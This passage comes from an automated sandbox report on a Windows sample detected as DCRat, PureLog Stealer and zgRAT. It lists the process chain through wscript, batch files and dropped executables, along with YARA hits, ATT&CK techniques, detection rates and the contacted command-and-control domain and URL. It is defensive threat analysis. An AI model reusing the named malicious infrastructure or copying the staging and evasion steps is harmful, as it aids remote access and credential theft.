J8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2919516072.00000000127C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: 0V2JsCrGUB.exe, 00000000.00000003.1652467398.0000000002B53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: MsAgentDriverruntime.exe, 00000004.00000002.1778578351.000000001B6E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: 0V2JsCrGUB.exe, 00000000.00000003.1652467398.0000000002B53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000001.00000003.1738383816.0000000003311000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\lgF
Source: MsAgentDriverruntime.exe, 00000004.00000002.1778578351.000000001B6E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: w32tm.exe, 00000009.00000002.1824649307.0000019AD0AC7000.00000004.00000020.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2921040169.000000001B040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

API call chain: ExitProcess graph end node

graph_0-23877

Source: C:\winRefruntime\MsAgentDriverruntime.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_0035F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0035F838

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_00367DEE mov eax, dword ptr fs:[00000030h]

0_2_00367DEE

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_0036C030 GetProcessHeap,

0_2_0036C030

Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0035F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0035F838
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0035F9D5 SetUnhandledExceptionFilter,	0_2_0035F9D5
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0035FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0035FBCA
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_00368EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00368EBD

Source: C:\winRefruntime\MsAgentDriverruntime.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winRefruntime\T8Mz9n0cgvFWE.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\winRefruntime\MsAgentDriverruntime.exe "C:\winRefruntime/MsAgentDriverruntime.exe"	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\WBnjVTGHzbhirvM.exe "C:\Recovery\WBnjVTGHzbhirvM.exe"	Jump to behavior

Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: own)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002A77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager0%
Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{},"5.0.1",5,1,"","user","830021","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_0035F654 cpuid

0_2_0035F654

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0035AF0F

Source: C:\winRefruntime\MsAgentDriverruntime.exe	Queries volume information: C:\winRefruntime\MsAgentDriverruntime.exe VolumeInformation	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Queries volume information: C:\Recovery\WBnjVTGHzbhirvM.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_0035DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0035DF1E

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_0034B146 GetVersionExW,

0_2_0034B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1776692230.0000000012F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MsAgentDriverruntime.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WBnjVTGHzbhirvM.exe PID: 7948, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0V2JsCrGUB.exe, type: SAMPLE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.6642709.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.4f7f709.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.MsAgentDriverruntime.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.6642709.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.4f7f709.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1739595481.0000000000812000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1648958225.00000000065F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1649569498.0000000004F31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\winRefruntime\MsAgentDriverruntime.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WBnjVTGHzbhirvM.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 0V2JsCrGUB.exe, type: SAMPLE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.6642709.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.4f7f709.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.MsAgentDriverruntime.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.6642709.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.4f7f709.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\winRefruntime\MsAgentDriverruntime.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WBnjVTGHzbhirvM.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1776692230.0000000012F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MsAgentDriverruntime.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WBnjVTGHzbhirvM.exe PID: 7948, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0V2JsCrGUB.exe, type: SAMPLE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.6642709.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.4f7f709.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.MsAgentDriverruntime.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.6642709.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.4f7f709.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1739595481.0000000000812000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1648958225.00000000065F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1649569498.0000000004F31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\winRefruntime\MsAgentDriverruntime.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WBnjVTGHzbhirvM.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 0V2JsCrGUB.exe, type: SAMPLE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.6642709.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.4f7f709.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.MsAgentDriverruntime.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.6642709.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.0V2JsCrGUB.exe.4f7f709.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\winRefruntime\MsAgentDriverruntime.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WBnjVTGHzbhirvM.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	2 Command and Scripting Interpreter	11 Scripting	12 Process Injection	31 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Software Packing	DCSync	136 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
0V2JsCrGUB.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
0V2JsCrGUB.exe	100%	Avira	VBS/Runner.VPG
0V2JsCrGUB.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Recovery\WBnjVTGHzbhirvM.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\sbJHDJmG.log	100%	Avira	TR/PSW.Agent.qngqt
C:\winRefruntime\MsAgentDriverruntime.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\viSXCyGd.log	100%	Avira	TR/AVI.Agent.updqb
C:\Recovery\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\WBnjVTGHzbhirvM.exe	100%	Avira	HEUR/AGEN.1323342
C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\Desktop\hnfQTxsY.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\GWwNmKBL.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Recovery\WBnjVTGHzbhirvM.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\WBnjVTGHzbhirvM.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\WBnjVTGHzbhirvM.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\sbJHDJmG.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\wJQffXMu.log	100%	Joe Sandbox ML
C:\winRefruntime\MsAgentDriverruntime.exe	100%	Joe Sandbox ML
C:\Recovery\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Recovery\WBnjVTGHzbhirvM.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\nFKhSFqw.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GWwNmKBL.log	100%	Joe Sandbox ML
C:\Recovery\WBnjVTGHzbhirvM.exe	100%	Joe Sandbox ML
C:\Recovery\WBnjVTGHzbhirvM.exe	100%	Joe Sandbox ML
C:\Recovery\WBnjVTGHzbhirvM.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\WmiPrvSE.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\Favorites\WBnjVTGHzbhirvM.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Desktop\WBnjVTGHzbhirvM.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\GWwNmKBL.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\PinddLxP.log	25%	ReversingLabs
C:\Users\user\Desktop\cZPJNcWU.log	25%	ReversingLabs
C:\Users\user\Desktop\hnfQTxsY.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\nFKhSFqw.log	8%	ReversingLabs
C:\Users\user\Desktop\sbJHDJmG.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\viSXCyGd.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\wJQffXMu.log	8%	ReversingLabs
C:\Windows\PLA\Templates\WBnjVTGHzbhirvM.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\winRefruntime\MsAgentDriverruntime.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://517300cm.rePR	0%	Avira URL Cloud	safe
http://517300cm.renyash.ru/	100%	Avira URL Cloud	malware
http://517300cm.renyash.ru	100%	Avira URL Cloud	malware
http://517300cm.renyash.ru/pipeJavascriptDefaulttrafficWp.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
517300cm.renyash.ru	104.21.38.84	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://517300cm.renyash.ru/pipeJavascriptDefaulttrafficWp.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://517300cm.renyash.ru/	WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MsAgentDriverruntime.exe, 00000004.00000002.1773406022.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://517300cm.rePR	WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://517300cm.renyash.ru	WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002A77000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.38.84	517300cm.renyash.ru	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586884
Start date and time:	2025-01-09 18:11:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0V2JsCrGUB.exe renamed because original name is a hash value
Original Sample Name:	4E9DDBFBEB41BD97825E0F79426307CB.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@18/26@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WBnjVTGHzbhirvM.exe, PID 7948 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 0V2JsCrGUB.exe

Simulations

Behavior and APIs

Time	Type	Description
12:12:14	API Interceptor	2442550x Sleep call for process: WBnjVTGHzbhirvM.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.38.84	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	495112cm.renyash.ru/vmLineMultiUniversalwp.php
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	250345cm.renyash.ru/sqltemp.php
	GqjiKlwarV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	101349cm.renyash.ru/VideovmGamedefaultTestuniversalwp.php
	1znAXdPcM5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	250345cm.renyash.ru/sqltemp.php
	U1jaLbTw1f.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
	ZZ2sTsJFrt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
	67VB5TS184.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
	gkcQYEdJSO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	1.3.115.13
	https://sora-ai-download.com/	Get hash	malicious	Unknown	Browse	104.22.20.144
	ReIayMSG__polarisrx.com_#7107380109.htm	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	Appraisal-nation-Review_and_Signature_Request46074.pdf	Get hash	malicious	Unknown	Browse	104.26.5.30
	ReIayMSG__polarisrx.com_#6577807268.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Appraisal-nation-Review_and_Signature_Request46074.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	104.21.32.1
	sora.arm7.elf	Get hash	malicious	Unknown	Browse	8.44.60.40

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\GWwNmKBL.log	PlZA6b48MW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse
	Z90Z9bYzPa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	0J5DzstGPi.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
